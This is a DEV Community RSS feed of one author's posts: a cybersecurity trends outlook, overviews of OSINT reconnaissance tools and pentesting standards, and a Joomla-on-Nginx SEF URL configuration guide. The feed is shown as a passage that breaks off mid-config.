<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Uladzislau Murashka</title>
    <description>The latest articles on DEV Community by Uladzislau Murashka (@sm0k3).</description>
    <link>https://dev.to/sm0k3</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F75405%2F6dd46b52-d33b-4f72-9970-439799da4dbb.jpg</url>
      <title>DEV Community: Uladzislau Murashka</title>
      <link>https://dev.to/sm0k3</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/sm0k3"/>
    <language>en</language>
    <item>
      <title>Cybersecurity Trends 2025–2026: Navigating the Next Wave of Digital Resilience</title>
      <dc:creator>Uladzislau Murashka</dc:creator>
      <pubDate>Wed, 06 Aug 2025 08:16:50 +0000</pubDate>
      <link>https://dev.to/sm0k3/cybersecurity-trends-2025-2026-navigating-the-next-wave-of-digital-resilience-lmm</link>
      <guid>https://dev.to/sm0k3/cybersecurity-trends-2025-2026-navigating-the-next-wave-of-digital-resilience-lmm</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsgu13c8h6jjpuap18k4z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsgu13c8h6jjpuap18k4z.png" alt=" " width="800" height="533"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Cybersecurity Trends 2025–2026: Navigating the Next Wave of Digital Resilience
&lt;/h2&gt;

&lt;p&gt;In an era defined by rapid digital transformation, cybersecurity stands at the forefront of strategic priorities for businesses across industries. As we look toward 2025–2026, a confluence of emerging technologies, evolving threat landscapes, and tightened regulations will reshape how organizations protect their data, assets, and reputation. This post delves into eight key trends—from AI-driven defense to regulatory mandates—arming you with insights to stay ahead of adversaries and build resilient security postures.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. AI-Powered Threat Detection and Response
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Rise of Autonomous Security Agents&lt;br&gt;&lt;br&gt;
Next-gen security platforms will deploy AI-driven agents capable of autonomously detecting anomalies, isolating compromised assets, and orchestrating containment workflows without human intervention.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Behavioral Analytics at Scale&lt;br&gt;&lt;br&gt;
Through machine learning, security tools will establish “normal” behavior baselines for users, devices, and applications—enabling real-time identification of insider threats and credential misuse.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Adversarial AI Arms Race&lt;br&gt;&lt;br&gt;
As defenders leverage AI, attackers will adopt AI to craft hyper-personalized phishing lures and AI-driven malware. This duel requires continuous innovation in defensive algorithms and threat intelligence sharing.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  2. Zero Trust Evolution in the Cloud Era
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Cloud-Native Zero Trust Architectures&lt;br&gt;&lt;br&gt;
Companies shifting workloads to multi-cloud and hybrid-cloud environments will embed Zero Trust principles—continuous authentication, least-privilege access, and micro-segmentation—into native cloud services.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Dynamic Policy Enforcement&lt;br&gt;&lt;br&gt;
Contextual factors (device health, geolocation, user risk scores) will dynamically adjust access policies. Integration with identity providers and XDR platforms ensures consistent policy enforcement across on-premises and cloud.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;SaaS-Specific Zero Trust Gateways&lt;br&gt;&lt;br&gt;
Dedicated Zero Trust gateways for popular SaaS applications (Salesforce, Microsoft 365, Google Workspace) will become ubiquitous, offering granular control, session monitoring, and real-time anomaly blocking.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  3. Regulatory Compliance 2.0: From GDPR to AI Governance
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Global Data Privacy Harmonization&lt;br&gt;&lt;br&gt;
Nations will intensify efforts to align data protection laws (GDPR, CCPA, Brazil’s LGPD), simplifying cross-border data flows while ensuring individual rights. Expect joint frameworks and mutual adequacy agreements.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;AI Ethics and Accountability&lt;br&gt;&lt;br&gt;
New regulations will mandate transparency in AI-driven security tools—forcing vendors to disclose decision-making processes, data sources, and bias mitigation strategies. Organizations must document AI governance frameworks.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Automated Compliance Monitoring&lt;br&gt;&lt;br&gt;
AI and RPA (Robotic Process Automation) will continuously audit configurations, access logs, and data transmission channels—automatically flagging compliance deviations and generating audit-ready reports.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  4. E-Commerce Security: Protecting the Digital Checkout
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Secure Payment Tokenization&lt;br&gt;&lt;br&gt;
Expanding tokenization protects credit card and banking details—leveraging hardware security modules (HSMs) and secure enclaves within edge devices to minimize data exposure.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Bot Mitigation with AI&lt;br&gt;&lt;br&gt;
AI-driven bot detection platforms will distinguish legitimate shopper behaviors from automated scraping and credential stuffing—ensuring checkout performance while thwarting fraud.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Supply-Chain Transparency&lt;br&gt;&lt;br&gt;
Blockchain-based ledgers will trace product authenticity, software dependencies, and third-party plugin integrity—reducing risk from counterfeit goods and rogue code.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  5. Automation &amp;amp; Orchestration: Streamlining Cyber Operations
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;SOAR Platforms Advance&lt;br&gt;&lt;br&gt;
Security Orchestration, Automation and Response (SOAR) solutions will integrate deeper with threat intel feeds and chatops, allowing analysts to resolve incidents via conversational interfaces and automated runbooks.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Crisis Simulations with Digital Twins&lt;br&gt;&lt;br&gt;
Organizations will employ digital twin environments replicating their entire IT estate—conducting realistic cyber-attack drills and resilience tests, then fine-tuning incident playbooks based on simulated outcomes.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;FinOps Meets SecOps&lt;br&gt;&lt;br&gt;
Security orchestration will begin factoring cost optimization—balancing resource-intensive threat hunts with budget constraints. Automated policies will dynamically allocate compute power for high-priority security tasks.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  6. Emerging Tech: IoT, 5G &amp;amp; Edge Security
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Securing the 5G Edge&lt;br&gt;&lt;br&gt;
The proliferation of 5G-connected devices demands lightweight security agents and distributed firewalls at the network edge—ensuring low-latency protection for autonomous vehicles, AR/VR platforms, and smart factories.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;IoT Device Identity Management&lt;br&gt;&lt;br&gt;
Robust identity frameworks, leveraging hardware-backed certificates and decentralized PKI, will authenticate billions of IoT endpoints—preventing device spoofing and lateral movement.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Edge AI for Real-Time Defense&lt;br&gt;&lt;br&gt;
Embedding AI within edge devices (cameras, sensors, routers) will enable on-device threat detection and encryption—reducing reliance on centralized analysis and mitigating network bottlenecks.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  7. Human Factor &amp;amp; Security Culture
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Continuous Phishing Simulations&lt;br&gt;&lt;br&gt;
Beyond annual training, organizations will run rolling, contextual phishing tests—tailored to emerging social engineering trends—and deploy micro-learning modules based on individual performance.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Security as a Board-Level Discussion&lt;br&gt;&lt;br&gt;
Cyber risk will be quantified in financial terms—integrated into enterprise risk management dashboards and regularly reviewed by executive leadership and boards of directors.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Psychological Safety for Security Teams&lt;br&gt;&lt;br&gt;
Fostering environments where analysts can escalate concerns and propose innovative defenses without fear of blame will improve detection rates and drive creative problem-solving.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  8. Threat Intelligence &amp;amp; Collaboration
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Industry-Specific ISACs 2.0&lt;br&gt;&lt;br&gt;
Information Sharing and Analysis Centers will evolve into proactive threat hunting communities—leveraging ML models to correlate data from diverse members and disseminate preemptive countermeasures.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Open-Source Threat Feeds&lt;br&gt;&lt;br&gt;
Collective intelligence platforms, powered by blockchain for data integrity, will democratize threat data—allowing organizations of all sizes to benefit from community-driven indicators of compromise (IOCs).&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Public-Private Cyber Partnerships&lt;br&gt;&lt;br&gt;
Governments and private sector entities will co-develop incident response frameworks—aligning on shared playbooks, legal safe harbors, and real-time threat-sharing protocols.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;As digital complexity accelerates, the intersection of AI, automation, and regulatory oversight will define the cybersecurity landscape in 2025–2026. Organizations that embrace autonomous defense, cultivate strong security cultures, and actively collaborate across industries will emerge more resilient against sophisticated threats.&lt;/p&gt;

&lt;p&gt;What trends resonate most with you? Which technologies are you already exploring or piloting within your organization? Share your experiences and predictions in the comments below—let’s learn from each other and shape the future of cybersecurity together.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>ai</category>
      <category>automation</category>
      <category>zerotrust</category>
    </item>
    <item>
      <title>Part 2: Useful OSINT Tools</title>
      <dc:creator>Uladzislau Murashka</dc:creator>
      <pubDate>Fri, 10 Mar 2023 15:14:50 +0000</pubDate>
      <link>https://dev.to/sm0k3/part-2-useful-osint-tools-169f</link>
      <guid>https://dev.to/sm0k3/part-2-useful-osint-tools-169f</guid>
      <description>&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--Zdn9s39f--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wp77gt9lsr44gglzz308.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--Zdn9s39f--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wp77gt9lsr44gglzz308.png" alt="OSINT tools" width="857" height="516"&gt;&lt;/a&gt;&lt;br&gt;
In the previous section, we discussed various categories of OSINT sources that can be used for passive reconnaissance. In this section, we will focus on some useful OSINT tools that can be used to collect information on our targets. Some of these tools may require integration with online services that we mentioned earlier.&lt;/p&gt;

&lt;h2&gt;Maltego&lt;/h2&gt;

&lt;p&gt;Maltego is a powerful OSINT tool that allows you to visualize and explore relationships between different pieces of information. It is designed to gather information about individuals, organizations, and networks using various sources of information such as social media, public records, and domain name information. Maltego can be used to map out an organization's infrastructure, including websites, IP addresses, DNS records, and social media profiles. It is available for Windows, Mac, and Linux operating systems.&lt;/p&gt;

&lt;h2&gt;theHarvester&lt;/h2&gt;

&lt;p&gt;theHarvester is a popular OSINT tool used for gathering email addresses, subdomains, and other information about a target domain. It can extract information from various sources such as search engines, public databases, and social networks. This tool can help you to identify email addresses associated with a domain name, and can be used to perform reconnaissance on the domain's infrastructure. theHarvester is a command-line tool and is available for Windows, Mac, and Linux operating systems.&lt;/p&gt;

&lt;h2&gt;Recon-ng&lt;/h2&gt;

&lt;p&gt;Recon-ng is a powerful OSINT tool that can be used for information gathering and reconnaissance. It is designed to automate the process of collecting information from various sources such as social media, search engines, and public databases. Recon-ng is a command-line tool and is available for Linux operating systems.&lt;/p&gt;

&lt;h2&gt;OSINT Framework&lt;/h2&gt;

&lt;p&gt;OSINT Framework is a comprehensive list of OSINT tools and resources that can be used for information gathering and reconnaissance. It includes tools for social media intelligence, domain name reconnaissance, and email address enumeration, among others. The OSINT Framework is a web-based tool and can be accessed from any device with internet connectivity.&lt;/p&gt;

&lt;h2&gt;SpiderFoot&lt;/h2&gt;

&lt;p&gt;SpiderFoot is an open-source OSINT automation tool that can be used for reconnaissance and information gathering. It is designed to automate the process of collecting information from various sources such as search engines, social networks, and public databases. SpiderFoot is a command-line tool and is available for Windows, Mac, and Linux operating systems.&lt;/p&gt;

&lt;h1&gt;Conclusion&lt;/h1&gt;

&lt;p&gt;In conclusion, OSINT is an important part of any information security assessment. It allows us to gather information about our targets using publicly available sources. There are various categories of OSINT sources that can be used for passive reconnaissance, and numerous tools that can be used to collect information on our targets. By using these tools and sources effectively, we can reduce the attack surface of our targets and minimize the risk of data breaches and other security incidents.&lt;/p&gt;

</description>
      <category>tools</category>
      <category>osint</category>
      <category>cybersecurity</category>
    </item>
    <item>
      <title>Useful online tools for OSINT</title>
      <dc:creator>Uladzislau Murashka</dc:creator>
      <pubDate>Mon, 18 Nov 2019 06:19:15 +0000</pubDate>
      <link>https://dev.to/sm0k3/useful-online-tools-for-osint-1455</link>
      <guid>https://dev.to/sm0k3/useful-online-tools-for-osint-1455</guid>
      <description>&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fwww.scanforsecurity.com%2Fwp-content%2Fuploads%2F2019%2F03%2Fnetwork-scanning-tools-696x464.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fwww.scanforsecurity.com%2Fwp-content%2Fuploads%2F2019%2F03%2Fnetwork-scanning-tools-696x464.jpg" title="Penetration testing: OSINT phase" alt="Outsourcing"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;What is OSINT (Passive recon phase)?&lt;/h2&gt;

&lt;p&gt;Open Source Intelligence, or "OSINT," was defined by the Department of Defense (DoD) as “produced from publicly available information that is collected, exploited, and disseminated in a timely manner to an appropriate audience for the purpose of addressing a specific intelligence requirement.” This process is also commonly referred to as “Digital Footprinting.”&lt;/p&gt;

&lt;p&gt;OSINT sources can be divided up into six different categories of information flow:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Internet: blogs, online publications, discussion groups, YouTube (videos) &amp;amp; Instagram, and other social media websites (i.e. Facebook, Twitter, Linkedin etc.). This source also outpaces a variety of other sources due to its timeliness and ease of access.&lt;/li&gt;
&lt;li&gt;Public: governmental data, public government reports, previous governmental data leaks, hearings, telephone directories, press conferences and websites. Although these come from official sources, they are publicly accessible and can be openly used.&lt;/li&gt;
&lt;li&gt;Professional/academic: publications and information acquired from journals, conferences, symposia, academic papers and dissertations; these fall under professional sources of information.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;Helpful online services for information gathering&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;a href="https://go.scanforsecurity.com/" rel="noopener noreferrer"&gt;Go.ScanForSecurity&lt;/a&gt; – This is a kind of mix where lots of solutions were integrated through API and it helps to identify subdomains, domains on the same IP, shows domain IP history, check for findings on OpenBugBounty and other useful checks.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a href="https://dnsdumpster.com/" rel="noopener noreferrer"&gt;Dnsdumpster&lt;/a&gt; is a domain research tool to find host-related information. It’s a HackerTarget.com project. Not just for subdomains, it gives you information about the DNS server, MX record, TXT record and nice mapping of your domain.&lt;br&gt;
The OpenBugBounty platform can be easily used to see if there were any findings previously on tested target without sending any requests directly. This platform can help you identify issues such as XSS, Open Redirect and CSRF. This platform is also accessible through API, but I didn’t find much useful documentation for it publicly available.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a href="https://www.virustotal.com/gui/home/search" rel="noopener noreferrer"&gt;VirusTotal&lt;/a&gt; can help you with subdomains’ enumeration process. It can show domain name history with IP changes, whether or not a domain was used for malware spreading and other useful information, including DNS reverse lookups. VirusTotal also has it own API which you can use, but it will be limited in the amount of sent requests you can send in the free version.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a href="https://shodan.io/" rel="noopener noreferrer"&gt;Shodan&lt;/a&gt; will give you all of the useful information about the target domain or IP address you could want, like open ports, used technology stack and possible vulnerabilities (you can use this data in combination with Vulners platform). The Shodan platform operates through API as well, so all actions can be easily automated.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;With the help of the &lt;a href="https://hunter.io/" rel="noopener noreferrer"&gt;Hunter.io service&lt;/a&gt;, you can find tons of email addresses for specific domain name. Furthermore, it will show you sources where this information was published. API is available as well.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;There are a good number of tools and methods available to find information about our targets in scope. The main thing is to define the goal correctly so that you collect the right information and do not waste time. Given the popularity of various social networks and the emergence of resources that perform mass scans or checks, collecting information becomes only a matter of time and of knowing such sources of information.&lt;/p&gt;

&lt;p&gt;In the next part I'll add some useful tools which you'll be able to launch from your PC, but some of them will still require integration with online services (including those mentioned above).&lt;/p&gt;

</description>
      <category>recon</category>
      <category>osint</category>
      <category>onlinetools</category>
      <category>pentesting</category>
    </item>
    <item>
      <title>About Penetration Testing: Standards and Guides</title>
      <dc:creator>Uladzislau Murashka</dc:creator>
      <pubDate>Fri, 05 Jul 2019 14:03:00 +0000</pubDate>
      <link>https://dev.to/sm0k3/about-penetration-testing-standards-and-guides-pmn</link>
      <guid>https://dev.to/sm0k3/about-penetration-testing-standards-and-guides-pmn</guid>
      <description>&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fka3j5hgohajkbmqbie4s.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fka3j5hgohajkbmqbie4s.jpg" title="About penetration testing: Guides &amp;amp; Standards" alt="Outsourcing"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;What's this for?&lt;/h2&gt;

&lt;p&gt;Everybody knows that the penetration testing process is a kind of "art". It requires knowledge of a wide variety of technologies, operating systems, etc., and an understanding of how things work. In addition, you should be attentive to detail and have a rich imagination for how any weakness can be used, be it in a system or in a human.&lt;/p&gt;

&lt;p&gt;Pentesters are unique people with their own style of work, but in the enterprise world, and even more so on a commercial basis, we should follow some kind of standard to be sure that the scope of work is covered in full, and we need to classify vulnerabilities somehow. This is where commonly used standards, guides and classifications come in.&lt;/p&gt;

&lt;p&gt;Furthermore, customers may sometimes ask you about your plans and skills, and you'll need to describe the process of work (penetration testing).&lt;/p&gt;

&lt;h2&gt;Popular standards and guides in penetration testing&lt;/h2&gt;

&lt;p&gt;The most popular standards that come to mind are:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents" rel="noopener noreferrer"&gt;OWASP Testing Guide&lt;/a&gt; - popular standard and guide for web application security testing, which covers lots of security checks against web application and it's logic.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.owasp.org/index.php/OWASP_Mobile_Security_Testing_Guide" rel="noopener noreferrer"&gt;OWASP Mobile Testing Guide&lt;/a&gt; - is a comprehensive manual for mobile app security testing and reverse engineering for iOS and Android mobile security testers which covers everything from deployment of testing environment to tools and techniques which can be used during security tests execution.&lt;/li&gt;
&lt;li&gt;
&lt;a href="http://projects.webappsec.org/f/WASC-TC-v2_0.pdf" rel="noopener noreferrer"&gt;WASC&lt;/a&gt; - Old and extended guidance for web application security testing. WASC includes huge amount of security checks which security specialist can execute against web application. Officially it sounds like: "The WASC Threat Classification is a cooperative effort to clarify and organize the
threats to the security of a web site."&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://csrc.nist.gov/publications/detail/sp/800-115/final" rel="noopener noreferrer"&gt;NIST 800-115&lt;/a&gt; - Very popular commonly used standard (including GOV) for network and infrastructure security evaluation.&lt;/li&gt;
&lt;li&gt;Penetration Testing Framework - easy step by step guide on how to execute &lt;a href="https://dev.to/sm0k3/about-penetration-testing-143l"&gt;penetration testing&lt;/a&gt; (like from zero to hero).&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;Why should we use those guides&lt;/h2&gt;

&lt;p&gt;In the first place, the use of such guides not only helps to perform pentesting correctly but also guarantees a certain minimum of checks that will be done by following the instructions from, for example, the OWASP Testing Guide or NIST. All these standards are based on previously made mistakes and previous experience, as well as on current and past statistics and best practices.&lt;/p&gt;

&lt;p&gt;Let's highlight some key points:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Understanding how a pentest goes, not only from the performer's perspective but also from the potential customer's perspective (fewer questions for us).&lt;/li&gt;
&lt;li&gt;We must do things right from the first steps, so we can rely on commonly recognized standards.&lt;/li&gt;
&lt;li&gt;We must have a basic minimum of checks performed; you won’t keep everything in your head, and here again standards help us. Everything beyond that is based on your imagination and experience.&lt;/li&gt;
&lt;li&gt;All compliance checks are based on such standards.&lt;/li&gt;
&lt;li&gt;If you don't know something, you can always refer to the standards. This is especially useful when you are just beginning your way in cyber security, or when you, for example, need to request penetration testing but don't know what questions to ask, how to create a scope of work, or how to tell whether the specialists from the hired company execute their checks properly.&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;Vulnerabilities classification and proper risk assessment&lt;/h2&gt;

&lt;p&gt;Vulnerabilities can also be classified with the help of standards and classifications. Let's take a look at some popular ones:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://www.owasp.org/index.php/Top_10-2017_Top_10" rel="noopener noreferrer"&gt;OWASP TOP10&lt;/a&gt; - used for web applications.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.owasp.org/index.php/Mobile_Top_10_2016-Top_10" rel="noopener noreferrer"&gt;OWASP TOP10 Mobile&lt;/a&gt; - used for mobile applications.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.first.org/cvss/" rel="noopener noreferrer"&gt;CVSS&lt;/a&gt; - The Common Vulnerability Scoring System can be used for everything else.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;When you need to create a report and describe vulnerabilities, how can you explain to the technical owner that this or that vulnerability is critical?&lt;/p&gt;

&lt;p&gt;All identified vulnerabilities (or security misconfigurations) should be classified with parameters such as:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Severity&lt;/li&gt;
&lt;li&gt;Likelihood&lt;/li&gt;
&lt;li&gt;Impact (business) level&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Based on the results obtained from your scans and/or manual research, you can later correlate them with information from OWASP or CVSS and assign a specific level of criticality (i.e. low, medium, high) to each vulnerability.&lt;/p&gt;

</description>
      <category>nist</category>
      <category>owasp</category>
      <category>standards</category>
      <category>guides</category>
    </item>
    <item>
      <title>Joomla on Nginx: Making SEF URLs</title>
      <dc:creator>Uladzislau Murashka</dc:creator>
      <pubDate>Tue, 16 Apr 2019 05:48:34 +0000</pubDate>
      <link>https://dev.to/sm0k3/joomla-on-nginx-making-sef-urls-1co6</link>
      <guid>https://dev.to/sm0k3/joomla-on-nginx-making-sef-urls-1co6</guid>
      <description>&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--RwfRpSQz--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://thepracticaldev.s3.amazonaws.com/i/qor2vtvu8v0ib5aaudbb.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--RwfRpSQz--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://thepracticaldev.s3.amazonaws.com/i/qor2vtvu8v0ib5aaudbb.png" alt="Outsourcing" title="Setting up SEF urls for Joomla on Nginx with php-fpm"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Working freelance as an admin and security engineer, I sometimes get interesting tasks. This article is about setting up SEF URLs for Joomla running on Nginx. I searched the internet for information on how to set up such URLs but didn't find everything in one place. After applying some of the solutions, the administrative panel didn't work properly or, for example, the "index.php" file was shown, so here I will add a simple solution for how to make things work properly.&lt;/p&gt;

&lt;p&gt;The requirement was the following: redirect from the www to the non-www domain, use only HTTPS, remove trailing slashes and hide the "index.php" file from the address bar.&lt;br&gt;
Our stack: ISPmanager panel, Nginx + php-fpm and Joomla. I also want to mention that the customer asked to change the web server from Apache (used previously) to nginx with php-fpm.&lt;/p&gt;

&lt;p&gt;First of all, let's send users from http to https:&lt;/p&gt;

&lt;pre&gt;
server {
    listen 80;
    server_name mysite.com www.mysite.com;
    return 301 https://mysite.com$request_uri; ## sending users to https with no www
}
&lt;/pre&gt;

&lt;p&gt;The line with “return 301 ...” indicates that this redirect is permanent, not temporary (code 302 is a temporary redirect). Now users will only reach us over https. Moving on, we add the config for https and remove the www from the host (i.e. redirect users with the help of “rewrite”):&lt;/p&gt;

&lt;pre&gt;
server {
    listen 192.168.1.12:443 ssl;
    server_name mysite.com www.mysite.com;
    if ($http_host = www.mysite.com) {
        rewrite  (.*)  https://mysite.com$request_uri; ## rewriting path to the non-www domain
    }
    ...other part of the config...
}
&lt;/pre&gt;

&lt;p&gt;Here we set up the redirect from www and started the configuration for https. The next step is to hide the “index.php” file so that it does not show in the URL:&lt;/p&gt;

&lt;pre&gt;
rewrite ^/index.php/(.*) /$1  permanent; ##hiding our index.php file
&lt;/pre&gt;

&lt;p&gt;Next comes the standard nginx config, taking into account operation under SSL; I do not publish it here, but at the end of the article the full config is available as is. The next step is to set up the SEF URLs and remove trailing slashes (i.e. if the user enters, for example, 3 slashes at the end, they will disappear and the page will load correctly, with no error like 404), while not forgetting about correct 404 handling:&lt;/p&gt;

&lt;pre&gt;
location / {
    try_files $uri $uri/ @joomlaurls; ## adding our processing rules
}
location @joomlaurls {
    rewrite ^/(.+)/$ /$1 permanent; ## removing slashes
    try_files $uri $uri/ /index.php?$args; ## setting up SEF urls
}
location ~ [^/]\.ph(p\d*|tml)$ {
    try_files /does_not_exists @php; ## processing 404
}

access_log off;
location @php {
    fastcgi_index index.php;
    fastcgi_pass unix:/var/www/php-fpm/www-root.sock;
    fastcgi_split_path_info ^((?U).+\.ph(?:p\d*|tml))(/?.+)$;
    try_files $uri =404;
    include fastcgi_params;
}
&lt;/pre&gt;

&lt;p&gt;Our site will properly handle all the SEF urls, give 404 if there is no page, remove slashes from the address bar, and also hide the “index.php” file from the path, by default we will have the “index.php” file read from the folder so here no need to point at it directly.&lt;/p&gt;

&lt;p&gt;One more thing about the admin panel - if the config is crooked, then the Joomla admin panel will not work at all, or it will open clumsily along the path “/administrator/index.php” and only this way, with the config that I gave above - everything will be processed and work correctly. Also in Joomla itself, you also need to activate the redirect function (in the admin area or Joomla).&lt;/p&gt;

&lt;p&gt;Below is the full configuration file I used with nginx and php-fpm:&lt;/p&gt;

&lt;pre&gt;
server {
    listen 80;
    server_name mysite.com www.mysite.com;
    return 301 https://mysite.com$request_uri;
}

server {
    listen 443 ssl;
    server_name www.mysite.com;
    return 301 $scheme://mysite.com$request_uri;
}

server {
    listen 192.168.1.12:443 ssl;
    server_name mysite.com www.mysite.com;

    if ($http_host = www.mysite.com) {
        rewrite (.*) https://mysite.com$request_uri;
    }
    rewrite ^/index.php/(.*) /$1 permanent; ## hiding our index.php file

    ssl_certificate "/var/www/httpd-cert/www-root/mysite.com.crtca";
    ssl_certificate_key "/var/www/httpd-cert/www-root/mysite.com.key";
    ssl_ciphers EECDH:+AES256:-3DES:RSA+AES:!NULL:!RC4;
    ssl_prefer_server_ciphers on;
    ## TLSv1 and TLSv1.1 are deprecated; on a current nginx/OpenSSL prefer "TLSv1.2 TLSv1.3"
    ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
    add_header Strict-Transport-Security "max-age=31536000;";
    ssl_dhparam /etc/ssl/certs/dhparam4096.pem;

    charset off;
    index index.php;
    disable_symlinks if_not_owner from=$root_path;

    include /etc/nginx/vhosts-includes/*.conf;
    include /etc/nginx/vhosts-resources/mysite.com/*.conf;

    error_log /var/www/httpd-logs/mysite.com.error.log notice;
    ssi on;

    set $root_path /var/www/www-root/data/www/mysite.com;
    root $root_path;

    gzip on;
    gzip_comp_level 9;
    gzip_disable "msie6";
    gzip_types text/plain text/css application/json application/x-javascript text/xml application/xml application/xml+rss text/javascript application/javascript;

    location / {
